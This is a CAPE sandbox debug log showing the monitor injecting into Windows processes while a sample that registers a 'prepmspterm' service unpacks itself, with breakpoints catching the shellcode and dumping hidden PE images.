2019-10-10 02:01:47,497 [root] DEBUG: DLL loaded at 0x74EB0000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2019-10-10 02:01:47,497 [root] DEBUG: DLL loaded at 0x742A0000: C:\Windows\system32\propsys (0xf5000 bytes).
2019-10-10 02:01:47,497 [root] DEBUG: DLL unloaded from 0x75E70000.
2019-10-10 02:01:47,545 [root] DEBUG: DLL loaded at 0x749D0000: C:\Windows\system32\ntmarta (0x21000 bytes).
2019-10-10 02:01:47,545 [root] DEBUG: DLL loaded at 0x76EA0000: C:\Windows\syswow64\WLDAP32 (0x45000 bytes).
2019-10-10 02:01:47,717 [root] INFO: Announced 64-bit process name: explorer.exe pid: 1632
2019-10-10 02:01:47,717 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2019-10-10 02:01:47,717 [lib.api.process] INFO: 64-bit DLL to inject is C:\esgppejl\dll\pZBYujCR.dll, loader C:\esgppejl\bin\DryJIDvq.exe
2019-10-10 02:01:47,747 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\eKzZugK.
2019-10-10 02:01:47,747 [root] DEBUG: Loader: Injecting process 1632 (thread 0) with C:\esgppejl\dll\pZBYujCR.dll.
2019-10-10 02:01:47,763 [root] DEBUG: InjectDll: No thread ID supplied, GetProcessInitialThreadId failed.
2019-10-10 02:01:47,795 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 02:01:47,809 [root] DEBUG: Process dumps disabled.
2019-10-10 02:01:47,825 [root] INFO: Disabling sleep skipping.
2019-10-10 02:01:47,888 [root] WARNING: Unable to place hook on LockResource
2019-10-10 02:01:47,888 [root] WARNING: Unable to hook LockResource
2019-10-10 02:01:47,966 [root] DEBUG: Debugger initialised.
2019-10-10 02:01:47,966 [root] DEBUG: CAPE initialised: 64-bit Extraction package loaded in process 1632 at 0x00000000741B0000, image base 0x00000000FF900000, stack from 0x0000000003AE2000-0x0000000003AF0000
2019-10-10 02:01:47,966 [root] DEBUG: Commandline: C:\Windows\explorer.exe.
2019-10-10 02:01:48,029 [root] DEBUG: AddTrackedRegion: EntryPoint 0x2b790, Entropy 5.860278e+00
2019-10-10 02:01:48,029 [root] DEBUG: AddTrackedRegion: Region at 0x00000000FF900000 size 0x1000 added to tracked regions.
2019-10-10 02:01:48,029 [root] DEBUG: ExtractionInit: Adding main image base to tracked regions.
2019-10-10 02:01:48,029 [root] INFO: Added new process to list with pid: 1632
2019-10-10 02:01:48,029 [root] INFO: Monitor successfully loaded in process with pid 1632.
2019-10-10 02:01:48,043 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2019-10-10 02:01:48,043 [root] DEBUG: InjectDll: Successfully injected DLL via thread.
2019-10-10 02:01:48,043 [root] DEBUG: Successfully injected DLL C:\esgppejl\dll\pZBYujCR.dll.
2019-10-10 02:01:48,075 [root] DEBUG: DLL unloaded from 0x742A0000.
2019-10-10 02:01:48,075 [root] DEBUG: DLL loaded at 0x74C70000: C:\Windows\system32\CRYPTSP (0x16000 bytes).
2019-10-10 02:01:48,075 [root] DEBUG: DLL loaded at 0x74C30000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2019-10-10 02:01:48,091 [root] DEBUG: DLL loaded at 0x74930000: C:\Windows\system32\RpcRtRemote (0xe000 bytes).
2019-10-10 02:01:48,107 [root] DEBUG: DLL loaded at 0x747D0000: C:\Windows\system32\mssprxy (0xc000 bytes).
2019-10-10 02:01:48,121 [root] DEBUG: DLL unloaded from 0x747D0000.
2019-10-10 02:01:48,121 [root] DEBUG: DLL unloaded from 0x75E70000.
2019-10-10 02:01:48,184 [root] DEBUG: DLL unloaded from 0x75C10000.
2019-10-10 02:01:48,278 [root] INFO: Announced starting service "prepmspterm"
2019-10-10 02:01:48,278 [root] INFO: Attaching to Service Control Manager (services.exe - pid 460)
2019-10-10 02:01:48,293 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2019-10-10 02:01:48,293 [lib.api.process] INFO: 64-bit DLL to inject is C:\esgppejl\dll\pZBYujCR.dll, loader C:\esgppejl\bin\DryJIDvq.exe
2019-10-10 02:01:48,309 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\eKzZugK.
2019-10-10 02:01:48,309 [root] DEBUG: Loader: Injecting process 460 (thread 0) with C:\esgppejl\dll\pZBYujCR.dll.
2019-10-10 02:01:48,309 [root] DEBUG: InjectDll: No thread ID supplied. Initial thread ID 2256, handle 0x84
2019-10-10 02:01:48,309 [root] DEBUG: Process image base: 0x00000000FFA10000
2019-10-10 02:01:48,309 [root] DEBUG: InjectDllViaIAT: Not a new process, aborting IAT patch
2019-10-10 02:01:48,309 [root] DEBUG: InjectDll: IAT patching failed, falling back to thread injection.
2019-10-10 02:01:48,325 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 02:01:48,325 [root] DEBUG: Process dumps disabled.
2019-10-10 02:01:48,341 [root] INFO: Disabling sleep skipping.
2019-10-10 02:01:48,341 [root] WARNING: Unable to place hook on LockResource
2019-10-10 02:01:48,341 [root] WARNING: Unable to hook LockResource
2019-10-10 02:01:48,355 [root] DEBUG: Debugger initialised.
2019-10-10 02:01:48,371 [root] DEBUG: CAPE initialised: 64-bit Extraction package loaded in process 460 at 0x00000000741B0000, image base 0x00000000FFA10000, stack from 0x0000000002F56000-0x0000000002F60000
2019-10-10 02:01:48,371 [root] DEBUG: Commandline: C:\Windows\sysnative\services.exe.
2019-10-10 02:01:48,403 [root] DEBUG: AddTrackedRegion: EntryPoint 0x13310, Entropy 6.073551e+00
2019-10-10 02:01:48,403 [root] DEBUG: AddTrackedRegion: Region at 0x00000000FFA10000 size 0x1000 added to tracked regions.
2019-10-10 02:01:48,418 [root] DEBUG: ExtractionInit: Adding main image base to tracked regions.
2019-10-10 02:01:48,418 [root] INFO: Added new process to list with pid: 460
2019-10-10 02:01:48,418 [root] INFO: Monitor successfully loaded in process with pid 460.
2019-10-10 02:01:48,418 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2019-10-10 02:01:48,418 [root] DEBUG: InjectDll: Successfully injected DLL via thread.
2019-10-10 02:01:48,434 [root] DEBUG: Successfully injected DLL C:\esgppejl\dll\pZBYujCR.dll.
2019-10-10 02:01:49,073 [root] DEBUG: DLL unloaded from 0x000007FEFD430000.
2019-10-10 02:01:49,167 [root] INFO: Announced starting service "WerSvc"
2019-10-10 02:01:49,167 [root] INFO: Attaching to Service Control Manager (services.exe - pid 460)
2019-10-10 02:01:49,167 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2019-10-10 02:01:49,167 [lib.api.process] INFO: 64-bit DLL to inject is C:\esgppejl\dll\pZBYujCR.dll, loader C:\esgppejl\bin\DryJIDvq.exe
2019-10-10 02:01:49,167 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\eKzZugK.
2019-10-10 02:01:49,167 [root] DEBUG: Loader: Injecting process 460 (thread 0) with C:\esgppejl\dll\pZBYujCR.dll.
2019-10-10 02:01:49,183 [root] DEBUG: InjectDll: No thread ID supplied, GetProcessInitialThreadId failed.
2019-10-10 02:01:49,183 [root] DEBUG: set_caller_info: Adding region at 0x0000000000380000 to caller regions list.
2019-10-10 02:01:49,183 [root] DEBUG: DLL loaded at 0x0000000004680000: C:\esgppejl\dll\pZBYujCR (0xe3000 bytes).
2019-10-10 02:01:49,213 [root] DEBUG: DLL unloaded from 0x0000000076FF0000.
2019-10-10 02:01:49,230 [root] DEBUG: DLL unloaded from 0x0000000004680000.
2019-10-10 02:01:49,246 [root] DEBUG: Error 998 (0x3e6) - InjectDllViaThread: RtlCreateUserThread injection failed: Invalid access to memory location.
2019-10-10 02:01:49,260 [root] DEBUG: InjectDll: DLL injection via thread failed.
2019-10-10 02:01:49,260 [root] DEBUG: Failed to inject DLL C:\esgppejl\dll\pZBYujCR.dll.
2019-10-10 02:01:49,260 [lib.api.process] ERROR: Unable to inject into 64-bit process with pid 460, error: -8
2019-10-10 02:01:49,480 [root] INFO: Announced 32-bit process name: prepmspterm.exe pid: 2128
2019-10-10 02:01:49,494 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2019-10-10 02:01:49,494 [lib.api.process] INFO: 32-bit DLL to inject is C:\esgppejl\dll\JpZrOO.dll, loader C:\esgppejl\bin\GwzPaJk.exe
2019-10-10 02:01:49,510 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\eKzZugK.
2019-10-10 02:01:49,510 [root] DEBUG: Loader: Injecting process 2128 (thread 996) with C:\esgppejl\dll\JpZrOO.dll.
2019-10-10 02:01:49,526 [root] DEBUG: Process image base: 0x00400000
2019-10-10 02:01:49,526 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\esgppejl\dll\JpZrOO.dll.
2019-10-10 02:01:49,542 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x0049C000 - 0x77110000
2019-10-10 02:01:49,558 [root] DEBUG: InjectDllViaIAT: Allocated 0x200 bytes for new import table at 0x004A0000.
2019-10-10 02:01:49,558 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-10-10 02:01:49,558 [root] DEBUG: Successfully injected DLL C:\esgppejl\dll\JpZrOO.dll.
2019-10-10 02:01:49,558 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2128
2019-10-10 02:01:49,604 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 02:01:49,619 [root] DEBUG: Process dumps disabled.
2019-10-10 02:01:49,619 [root] INFO: Disabling sleep skipping.
2019-10-10 02:01:49,619 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-10-10 02:01:49,635 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x7716124a, Wow64PrepareForException: 0x0
2019-10-10 02:01:49,635 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x280000
2019-10-10 02:01:49,635 [root] DEBUG: Debugger initialised.
2019-10-10 02:01:49,635 [root] DEBUG: CAPE initialised: 32-bit Extraction package loaded in process 2128 at 0x747e0000, image base 0x400000, stack from 0x186000-0x190000
2019-10-10 02:01:49,635 [root] DEBUG: Commandline: C:\Windows\System32\"C:\Windows\SysWOW64\prepmspterm.exe".
2019-10-10 02:01:49,651 [root] DEBUG: AddTrackedRegion: EntryPoint 0x7dd3, Entropy 4.831530e+00
2019-10-10 02:01:49,651 [root] DEBUG: AddTrackedRegion: Region at 0x00400000 size 0x1000 added to tracked regions.
2019-10-10 02:01:49,651 [root] DEBUG: ExtractionInit: Adding main image base to tracked regions.
2019-10-10 02:01:49,651 [root] INFO: Added new process to list with pid: 2128
2019-10-10 02:01:49,651 [root] INFO: Monitor successfully loaded in process with pid 2128.
2019-10-10 02:01:49,681 [root] DEBUG: Allocation: 0x00290000 - 0x002A0000, size: 0x10000, protection: 0x40.
2019-10-10 02:01:49,681 [root] DEBUG: AddTrackedRegion: Region at 0x00290000 size 0x10000 added to tracked regions.
2019-10-10 02:01:49,681 [root] DEBUG: ActivateBreakpoints: TrackedRegion->AllocationBase: 0x00290000, TrackedRegion->RegionSize: 0x10000, thread 996
2019-10-10 02:01:49,697 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xd0, Size=0x2, Address=0x00290000 and Type=0x1.
2019-10-10 02:01:49,697 [root] DEBUG: SetThreadBreakpoint: Set bp 0 thread id 996 type 1 at address 0x00290000, size 2 with Callback 0x747e7700.
2019-10-10 02:01:49,697 [root] DEBUG: ActivateBreakpoints: Set write breakpoint on empty protect address: 0x00290000
2019-10-10 02:01:49,697 [root] DEBUG: SetDebugRegister: Setting breakpoint 1 hThread=0xd0, Size=0x4, Address=0x0029003C and Type=0x1.
2019-10-10 02:01:49,697 [root] DEBUG: SetThreadBreakpoint: Set bp 1 thread id 996 type 1 at address 0x0029003C, size 4 with Callback 0x747e7320.
2019-10-10 02:01:49,697 [root] DEBUG: ActivateBreakpoints: Set write breakpoint on e_lfanew address: 0x0029003C
2019-10-10 02:01:49,713 [root] DEBUG: AllocationHandler: Breakpoints set on newly-allocated executable region at: 0x00290000 (size 0x10000).
2019-10-10 02:01:49,713 [root] DEBUG: DLL unloaded from 0x772F0000.
2019-10-10 02:01:49,713 [root] DEBUG: CAPEExceptionFilter: breakpoint hit by instruction at 0x74DBAE7A (thread 996)
2019-10-10 02:01:49,713 [root] DEBUG: BaseAddressWriteCallback: Breakpoint 0 at Address 0x00290000.
2019-10-10 02:01:49,713 [root] DEBUG: ContextSetDebugRegister: Setting breakpoint 2 within Context, Size=0x0, Address=0x00290000 and Type=0x0.
2019-10-10 02:01:49,729 [root] DEBUG: BaseAddressWriteCallback: byte written to 0x290000: 0xce.
2019-10-10 02:01:49,729 [root] DEBUG: BaseAddressWriteCallback: Exec bp set on tracked region protect address.
2019-10-10 02:01:49,744 [root] DEBUG: CAPEExceptionFilter: breakpoint hit by instruction at 0x74DBAE7A (thread 996)
2019-10-10 02:01:49,792 [root] DEBUG: PEPointerWriteCallback: Breakpoint 1 at Address 0x0029003C.
2019-10-10 02:01:49,792 [root] DEBUG: PEPointerWriteCallback: candidate pointer to PE header too big: 0xdc777811 (at 0x0029003C).
2019-10-10 02:01:49,792 [root] DEBUG: ContextSetThreadBreakpoint: An identical breakpoint (2) at 0x00290000 already exists for thread 996 (process 2128), skipping.
2019-10-10 02:01:49,792 [root] DEBUG: PEPointerWriteCallback: set write bp on AddressOfEntryPoint at 0x00290000.
2019-10-10 02:01:49,792 [root] DEBUG: CAPEExceptionFilter: breakpoint hit by instruction at 0x004034CF (thread 996)
2019-10-10 02:01:49,806 [root] DEBUG: BaseAddressWriteCallback: Breakpoint 0 at Address 0x00290000.
2019-10-10 02:01:49,806 [root] DEBUG: ContextSetThreadBreakpoint: An identical breakpoint (2) at 0x00290000 already exists for thread 996 (process 2128), skipping.
2019-10-10 02:01:49,822 [root] DEBUG: BaseAddressWriteCallback: byte written to 0x290000: 0xe8.
2019-10-10 02:01:49,838 [root] DEBUG: BaseAddressWriteCallback: Exec bp set on tracked region protect address.
2019-10-10 02:01:49,838 [root] DEBUG: CAPEExceptionFilter: breakpoint hit by instruction at 0x004034CF (thread 996)
2019-10-10 02:01:49,838 [root] DEBUG: BaseAddressWriteCallback: Breakpoint 0 at Address 0x00290000.
2019-10-10 02:01:49,838 [root] DEBUG: ContextSetThreadBreakpoint: An identical breakpoint (2) at 0x00290000 already exists for thread 996 (process 2128), skipping.
2019-10-10 02:01:49,854 [root] DEBUG: BaseAddressWriteCallback: byte written to 0x290000: 0xe8.
2019-10-10 02:01:49,854 [root] DEBUG: BaseAddressWriteCallback: Exec bp set on tracked region protect address.
2019-10-10 02:01:49,854 [root] DEBUG: CAPEExceptionFilter: breakpoint hit by instruction at 0x004034CF (thread 996)
2019-10-10 02:01:49,854 [root] DEBUG: PEPointerWriteCallback: Breakpoint 1 at Address 0x0029003C.
2019-10-10 02:01:49,869 [root] DEBUG: PEPointerWriteCallback: candidate pointer to PE header too big: 0xdc777856 (at 0x0029003C).
2019-10-10 02:01:49,869 [root] DEBUG: ContextSetThreadBreakpoint: An identical breakpoint (2) at 0x00290000 already exists for thread 996 (process 2128), skipping.
2019-10-10 02:01:49,869 [root] DEBUG: PEPointerWriteCallback: set write bp on AddressOfEntryPoint at 0x00290000.
2019-10-10 02:01:49,869 [root] DEBUG: CAPEExceptionFilter: breakpoint hit by instruction at 0x004034CF (thread 996)
2019-10-10 02:01:49,884 [root] DEBUG: PEPointerWriteCallback: Breakpoint 1 at Address 0x0029003C.
2019-10-10 02:01:49,884 [root] DEBUG: PEPointerWriteCallback: candidate pointer to PE header too big: 0xdc775756 (at 0x0029003C).
2019-10-10 02:01:49,915 [root] DEBUG: ContextSetThreadBreakpoint: An identical breakpoint (2) at 0x00290000 already exists for thread 996 (process 2128), skipping.
2019-10-10 02:01:49,915 [root] DEBUG: PEPointerWriteCallback: set write bp on AddressOfEntryPoint at 0x00290000.
2019-10-10 02:01:49,931 [root] DEBUG: CAPEExceptionFilter: breakpoint hit by instruction at 0x004034CF (thread 996)
2019-10-10 02:01:49,931 [root] DEBUG: PEPointerWriteCallback: Breakpoint 1 at Address 0x0029003C.
2019-10-10 02:01:49,931 [root] DEBUG: PEPointerWriteCallback: candidate pointer to PE header too big: 0xdc335756 (at 0x0029003C).
2019-10-10 02:01:49,931 [root] DEBUG: ContextSetThreadBreakpoint: An identical breakpoint (2) at 0x00290000 already exists for thread 996 (process 2128), skipping.
2019-10-10 02:01:49,931 [root] DEBUG: PEPointerWriteCallback: set write bp on AddressOfEntryPoint at 0x00290000.
2019-10-10 02:01:49,931 [root] DEBUG: CAPEExceptionFilter: breakpoint hit by instruction at 0x004034CF (thread 996)
2019-10-10 02:01:49,963 [root] DEBUG: PEPointerWriteCallback: Breakpoint 1 at Address 0x0029003C.
2019-10-10 02:01:49,963 [root] DEBUG: PEPointerWriteCallback: candidate pointer to PE header too big: 0xf6335756 (at 0x0029003C).
2019-10-10 02:01:49,963 [root] DEBUG: ContextSetThreadBreakpoint: An identical breakpoint (2) at 0x00290000 already exists for thread 996 (process 2128), skipping.
2019-10-10 02:01:49,963 [root] DEBUG: PEPointerWriteCallback: set write bp on AddressOfEntryPoint at 0x00290000.
2019-10-10 02:01:49,963 [root] DEBUG: CAPEExceptionFilter: breakpoint hit by instruction at 0x00290000 (thread 996)
2019-10-10 02:01:49,979 [root] DEBUG: ShellcodeExecCallback: Breakpoint 2 at Address 0x00290000 (allocation base 0x00290000).
2019-10-10 02:01:49,979 [root] DEBUG: ShellcodeExecCallback: Debug: About to scan region for a PE image (base 0x00290000, size 0x10000).
2019-10-10 02:01:49,979 [root] DEBUG: DumpPEsInRange: Scanning range 0x290000 - 0x2a0000.
2019-10-10 02:01:49,979 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x29053f
2019-10-10 02:01:49,979 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump 'raw' PE image.
2019-10-10 02:01:50,009 [root] DEBUG: DumpPE: Instantiating PeParser with address: 0x0029053F.
2019-10-10 02:01:50,026 [root] INFO: Added new CAPE file to list with path: C:\QegxeawP\CAPE\2128_21241466365015104102019
2019-10-10 02:01:50,026 [root] DEBUG: DumpPE: PE file in memory dumped successfully - dump size 0xfa00.
2019-10-10 02:01:50,040 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x29073f-0x2a0000.
2019-10-10 02:01:50,040 [root] DEBUG: ShellcodeExecCallback: PE image(s) detected and dumped.
2019-10-10 02:01:50,040 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x290000 - 0x2a0000.
2019-10-10 02:01:50,040 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 0 address 0x00290000.
2019-10-10 02:01:50,040 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 1 address 0x0029003C.
2019-10-10 02:01:50,056 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 2 address 0x00290000.
2019-10-10 02:01:50,056 [root] DEBUG: set_caller_info: Adding region at 0x00290000 to caller regions list.
2019-10-10 02:01:50,072 [root] DEBUG: AddTrackedRegion: EntryPoint 0xd1c5, Entropy 5.270026e+00
2019-10-10 02:01:50,072 [root] DEBUG: AddTrackedRegion: Region at 0x00570000 size 0xe200 added to tracked regions.
2019-10-10 02:01:50,088 [root] DEBUG: ProtectionHandler: Address: 0x00571000 (alloc base 0x00570000), NumberOfBytesToProtect: 0xd200, NewAccessProtection: 0x20
2019-10-10 02:01:50,088 [root] DEBUG: ProtectionHandler: New code detected at (0x00570000), scanning for PE images.
2019-10-10 02:01:50,104 [root] DEBUG: DumpPEsInRange: Scanning range 0x570000 - 0x57e200.
2019-10-10 02:01:50,104 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x570000
2019-10-10 02:01:50,104 [root] DEBUG: DumpImageInCurrentProcess: Disguised PE image (bad MZ and/or PE headers) at 0x00570000
2019-10-10 02:01:50,104 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-10-10 02:01:50,118 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00570000.
2019-10-10 02:01:50,118 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000D1C5.
2019-10-10 02:01:50,134 [root] INFO: Added new CAPE file to list with path: C:\QegxeawP\CAPE\2128_14100630675011104102019
2019-10-10 02:01:50,134 [root] DEBUG: DumpProcess: Module image dump success - dump size 0xf400.
2019-10-10 02:01:50,134 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x570200-0x57e200.
2019-10-10 02:01:50,150 [root] DEBUG: ProtectionHandler: PE image(s) dumped from 0x00570000.
2019-10-10 02:01:50,150 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x570000 - 0x57e200.
2019-10-10 02:01:50,150 [root] DEBUG: set_caller_info: Adding region at 0x00570000 to caller regions list.
2019-10-10 02:01:50,181 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2019-10-10 02:01:50,197 [root] INFO: Announced 32-bit process name: prepmspterm.exe pid: 2636
2019-10-10 02:01:50,197 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2019-10-10 02:01:50,197 [lib.api.process] INFO: 32-bit DLL to inject is C:\esgppejl\dll\JpZrOO.dll, loader C:\esgppejl\bin\GwzPaJk.exe
2019-10-10 02:01:50,197 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\eKzZugK.
2019-10-10 02:01:50,197 [root] DEBUG: Loader: Injecting process 2636 (thread 2632) with C:\esgppejl\dll\JpZrOO.dll.
2019-10-10 02:01:50,213 [root] DEBUG: Process image base: 0x00400000
2019-10-10 02:01:50,213 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\esgppejl\dll\JpZrOO.dll.
2019-10-10 02:01:50,213 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x0049C000 - 0x77110000
2019-10-10 02:01:50,213 [root] DEBUG: InjectDllViaIAT: Allocated 0x200 bytes for new import table at 0x004A0000.
2019-10-10 02:01:50,213 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-10-10 02:01:50,213 [root] DEBUG: Successfully injected DLL C:\esgppejl\dll\JpZrOO.dll.
2019-10-10 02:01:50,213 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2636
2019-10-10 02:01:50,213 [root] DEBUG: NtTerminateProcess hook: Processing tracked regions before shutdown (process 2128).
2019-10-10 02:01:50,213 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 02:01:50,227 [root] DEBUG: Process dumps disabled.
2019-10-10 02:01:50,227 [root] DEBUG: DLL unloaded from 0x75140000.
2019-10-10 02:01:50,227 [root] DEBUG: NtTerminateProcess hook: Processing tracked regions before shutdown (process 2128).
2019-10-10 02:01:50,227 [root] INFO: Disabling sleep skipping.
2019-10-10 02:01:50,227 [root] INFO: Notified of termination of process with pid 2128.
2019-10-10 02:01:50,227 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-10-10 02:01:50,227 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x7716124a, Wow64PrepareForException: 0x0
2019-10-10 02:01:50,227 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x1d0000
2019-10-10 02:01:50,227 [root] DEBUG: Debugger initialised.
2019-10-10 02:01:50,243 [root] DEBUG: CAPE initialised: 32-bit Extraction package loaded in process 2636 at 0x747e0000, image base 0x400000, stack from 0x186000-0x190000
2019-10-10 02:01:50,259 [root] DEBUG: NtTerminateProcess hook: Processing tracked regions before shutdown (process 460).
2019-10-10 02:01:50,259 [root] DEBUG: Commandline: C:\Windows\System32\--525413bf.
2019-10-10 02:01:50,259 [root] DEBUG: ClearAllBreakpoints: Error getting thread context for thread 1988.
2019-10-10 02:01:50,259 [root] DEBUG: AddTrackedRegion: EntryPoint 0x7dd3, Entropy 4.831530e+00
2019-10-10 02:01:50,259 [root] WARNING: Unable to open termination event for pid 2128.
2019-10-10 02:01:50,259 [root] DEBUG: AddTrackedRegion: Region at 0x00400000 size 0x1000 added to tracked regions.
2019-10-10 02:01:50,259 [root] DEBUG: NtTerminateProcess hook: Processing tracked regions before shutdown (process 1436).
2019-10-10 02:01:50,259 [root] DEBUG: ExtractionInit: Adding main image base to tracked regions.
2019-10-10 02:01:50,259 [root] INFO: Added new process to list with pid: 2636
2019-10-10 02:01:50,259 [root] DEBUG: DLL unloaded from 0x742A0000.
2019-10-10 02:01:50,259 [root] INFO: Monitor successfully loaded in process with pid 2636.
2019-10-10 02:01:50,259 [root] DEBUG: DLL unloaded from 0x75140000.
2019-10-10 02:01:50,290 [root] DEBUG: DLL unloaded from 0x749D0000.
2019-10-10 02:01:50,290 [root] DEBUG: Allocation: 0x001E0000 - 0x001F0000, size: 0x10000, protection: 0x40.
2019-10-10 02:01:50,305 [root] DEBUG: NtTerminateProcess hook: Processing tracked regions before shutdown (process 1436).
2019-10-10 02:01:50,305 [root] INFO: Notified of termination of process with pid 1436.
2019-10-10 02:01:50,305 [root] DEBUG: AddTrackedRegion: Region at 0x001E0000 size 0x10000 added to tracked regions.
2019-10-10 02:01:50,305 [root] INFO: Announced 64-bit process name: svchost.exe pid: 1788
2019-10-10 02:01:50,305 [root] DEBUG: ActivateBreakpoints: TrackedRegion->AllocationBase: 0x001E0000, TrackedRegion->RegionSize: 0x10000, thread 2632
2019-10-10 02:01:50,305 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xd0, Size=0x2, Address=0x001E0000 and Type=0x1.
2019-10-10 02:01:50,305 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2019-10-10 02:01:50,305 [lib.api.process] INFO: 64-bit DLL to inject is C:\esgppejl\dll\pZBYujCR.dll, loader C:\esgppejl\bin\DryJIDvq.exe
2019-10-10 02:01:50,305 [root] DEBUG: SetThreadBreakpoint: Set bp 0 thread id 2632 type 1 at address 0x001E0000, size 2 with Callback 0x747e7700.
2019-10-10 02:01:50,305 [root] DEBUG: ActivateBreakpoints: Set write breakpoint on empty protect address: 0x001E0000
2019-10-10 02:01:50,305 [root] DEBUG: SetDebugRegister: Setting breakpoint 1 hThread=0xd0, Size=0x4, Address=0x001E003C and Type=0x1.
2019-10-10 02:01:50,322 [root] DEBUG: SetThreadBreakpoint: Set bp 1 thread id 2632 type 1 at address 0x001E003C, size 4 with Callback 0x747e7320.
2019-10-10 02:01:50,322 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\eKzZugK.
2019-10-10 02:01:50,322 [root] DEBUG: ActivateBreakpoints: Set write breakpoint on e_lfanew address: 0x001E003C
2019-10-10 02:01:50,322 [root] DEBUG: Loader: Injecting process 1788 (thread 1648) with C:\esgppejl\dll\pZBYujCR.dll.
2019-10-10 02:01:50,322 [root] DEBUG: AllocationHandler: Breakpoints set on newly-allocated executable region at: 0x001E0000 (size 0x10000).
2019-10-10 02:01:50,322 [root] DEBUG: Process image base: 0x00000000FFA10000
2019-10-10 02:01:50,322 [root] DEBUG: DLL unloaded from 0x772F0000.
2019-10-10 02:01:50,322 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\esgppejl\dll\pZBYujCR.dll.
2019-10-10 02:01:50,322 [root] DEBUG: CAPEExceptionFilter: breakpoint hit by instruction at 0x74DBAE7A (thread 2632)
2019-10-10 02:01:50,322 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x00000000FFA1B000 - 0x000007FEFF430000
2019-10-10 02:01:50,322 [root] DEBUG: BaseAddressWriteCallback: Breakpoint 0 at Address 0x001E0000.
2019-10-10 02:01:50,322 [root] DEBUG: InjectDllViaIAT: Allocated 0x210 bytes for new import table at 0x00000000FFA20000.
2019-10-10 02:01:50,322 [root] DEBUG: ContextSetDebugRegister: Setting breakpoint 2 within Context, Size=0x0, Address=0x001E0000 and Type=0x0.
2019-10-10 02:01:50,322 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-10-10 02:01:50,322 [root] DEBUG: BaseAddressWriteCallback: byte written to 0x1e0000: 0xce.
2019-10-10 02:01:50,338 [root] DEBUG: Successfully injected DLL C:\esgppejl\dll\pZBYujCR.dll.
2019-10-10 02:01:50,338 [root] DEBUG: BaseAddressWriteCallback: Exec bp set on tracked region protect address.
2019-10-10 02:01:50,338 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 1788
2019-10-10 02:01:50,338 [root] DEBUG: CAPEExceptionFilter: breakpoint hit by instruction at 0x74DBAE7A (thread 2632)
2019-10-10 02:01:50,338 [root] DEBUG: PEPointerWriteCallback: Breakpoint 1 at Address 0x001E003C.
2019-10-10 02:01:50,338 [root] DEBUG: PEPointerWriteCallback: candidate pointer to PE header too big: 0xdc777811 (at 0x001E003C).
2019-10-10 02:01:50,338 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 02:01:50,338 [root] DEBUG: ContextSetThreadBreakpoint: An identical breakpoint (2) at 0x001E0000 already exists for thread 2632 (process 2636), skipping.
2019-10-10 02:01:50,338 [root] DEBUG: Process dumps disabled.
2019-10-10 02:01:50,338 [root] DEBUG: PEPointerWriteCallback: set write bp on AddressOfEntryPoint at 0x001E0000.
2019-10-10 02:01:50,338 [root] DEBUG: CAPEExceptionFilter: breakpoint hit by instruction at 0x004034CF (thread 2632)
2019-10-10 02:01:50,338 [root] INFO: Disabling sleep skipping.
2019-10-10 02:01:50,338 [root] DEBUG: BaseAddressWriteCallback: Breakpoint 0 at Address 0x001E0000.
